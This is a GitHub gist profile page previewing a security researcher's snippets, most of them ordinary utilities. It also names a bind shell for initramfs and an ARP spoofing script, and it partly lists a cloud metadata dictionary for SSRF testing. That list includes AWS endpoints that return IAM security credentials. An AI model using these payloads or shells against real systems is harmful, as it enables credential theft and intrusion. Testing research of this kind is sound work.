Skip to content

Instantly share code, notes, and snippets.

View Matir's full-sized avatar

David Tomaschik Matir

View GitHub Profile
@Matir
Matir / extensioninventory.py
Created January 31, 2014 06:36
Show permissions of chrome extensions
import json
import os
import sys
import re
_ACCESS_ALL = '**Access your data on all websites**'
PERMISSIONS = {
'plugins': 'Access all data on your computer and the websites you visit',

Keybase proof

I hereby claim:

  • I am matir on github.
  • I am matir (https://keybase.io/matir) on keybase.
  • I have a public key whose fingerprint is 7FD5 8D9A 196D CEEE AD67 1F94 F4D7 A791 5DEA 789B

To claim this, I am signing this object:

@Matir
Matir / README.md
Last active March 8, 2017 20:19 — forked from ayosec/README.md
GDB commands to trace calls to malloc/free

Attach to a running process with

  gdb -x trace-dyn-mem -p $PID

After every malloc the returned value (the allocated address) will be read from the RAX (64 bits) register.

After every free the last item in the backtrace (the free itself) will be shown. With the libc6-dbg package installed you can see the address passed as the first argument of free.

@Matir
Matir / query.sh
Created November 5, 2017 20:52
Extracting the usernames of Chrome profiles using jq
jq '.profile.info_cache[]|.user_name' "${PROFILEDIR}/Local State"
@Matir
Matir / initramfs_bind_2323.c
Created January 16, 2018 03:07
bind shell that works in initramfs
/* One-off background bind shell with chroot for initramfs. */
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <stdio.h>
#define PORT 2323
@Matir
Matir / cloud_metadata.txt
Last active June 14, 2018 21:56 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Matir
Matir / sok-renamer.py
Created September 20, 2018 03:33
Rename videos from SoK with Title of Talk
import sys
from lxml import html
import os
import os.path
import re
run = True
buf = open(sys.argv[1]).read()
doc = html.fromstring(buf[:])
@Matir
Matir / dhcproute.py
Created September 23, 2018 00:50
Compute strings for DHCP Option 121, Classless Routes
import ipaddress
import math
import sys
def pack_address(addr):
"""Pack an IPv4 Address into colon-delimited format."""
return ':'.join('{:02x}'.format(c) for c in addr.packed)
@Matir
Matir / create-debian-usb-key.sh
Created November 12, 2019 18:58 — forked from nmaupu/create-debian-usb-key.sh
Create Debian USB key automatic installation (preseed)
#!/usr/bin/env bash
set -e -x -o pipefail
DIRNAME="$(dirname $0)"
DISK="$1"
: "${DEBIAN_RELEASE:=stretch}"
: "${DEBIAN_VERSION:=9.2.1}"
: "${DEBIAN_MIRROR:=http://ftp.debian.org}"
@Matir
Matir / arpspoof.py
Created July 12, 2017 17:47
ARP Spoofing from Python with Scapy
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,